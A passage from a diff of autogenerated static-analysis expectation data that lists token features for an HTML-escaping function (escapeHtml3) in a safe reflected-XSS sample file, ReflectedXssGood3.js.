parts.push('"') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | parts.push('"') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:15:84:18 | push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:15:84:18 | push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:15:84:18 | push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:15:84:18 | push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:15:84:18 | push | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | CalleeFlexibleAccessPath | parts.push | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20889,6 +139142,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:20:84:27 | '"' | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:19 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:19 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:19 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:19 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:19 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:22 | XMLChars.LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:22 | XMLChars.LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:22 | XMLChars.LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:22 | XMLChars.LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:12:86:22 | XMLChars.LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:21:86:22 | LT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:21:86:22 | LT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:21:86:22 | LT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:21:86:22 | LT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:86:21:86:22 | LT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:13 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:13 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:13 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:13 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:13 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:18 | parts.push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:18 | parts.push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:18 | parts.push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:18 | parts.push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:18 | parts.push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | exceptional return of parts.push('<') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | exceptional return of parts.push('<') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | exceptional return of parts.push('<') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | exceptional return of parts.push('<') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | exceptional return of parts.push('<') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | parts.push('<') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | parts.push('<') | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | parts.push('<') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | parts.push('<') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:9:87:26 | parts.push('<') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:15:87:18 | push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:15:87:18 | push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:15:87:18 | push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:15:87:18 | push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:15:87:18 | push | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | CalleeFlexibleAccessPath | parts.push | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20897,6 +139190,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:87:20:87:25 | '<' | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:19 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:19 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:19 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:19 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:19 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:22 | XMLChars.GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:22 | XMLChars.GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:22 | XMLChars.GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:22 | XMLChars.GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:12:89:22 | XMLChars.GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:21:89:22 | GT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:21:89:22 | GT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:21:89:22 | GT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:21:89:22 | GT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:89:21:89:22 | GT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:13 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:13 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:13 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:13 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:13 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:18 | parts.push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:18 | parts.push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:18 | parts.push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:18 | parts.push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:18 | parts.push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | exceptional return of parts.push('>') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | exceptional return of parts.push('>') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | exceptional return of parts.push('>') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | exceptional return of parts.push('>') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | exceptional return of parts.push('>') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | parts.push('>') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | parts.push('>') | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | parts.push('>') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | parts.push('>') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:9:90:26 | parts.push('>') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:15:90:18 | push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:15:90:18 | push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:15:90:18 | push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:15:90:18 | push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:15:90:18 | push | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | CalleeFlexibleAccessPath | parts.push | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20905,6 +139238,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:90:20:90:25 | '>' | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | ++i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | ++i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | ++i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | ++i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | ++i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:5:93:7 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:7:93:7 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:7:93:7 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:7:93:7 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:7:93:7 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:93:7:93:7 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:9 | j | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:9 | j | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:9 | j | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:9 | j | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:9 | j | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j = i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j = i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j = i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j = i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:9:94:13 | j = i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:13:94:13 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:13:94:13 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:13:94:13 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:13:94:13 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:94:13:94:13 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:12 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:21 | i < length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:21 | i < length | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:95:12:95:21 | i < length | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value 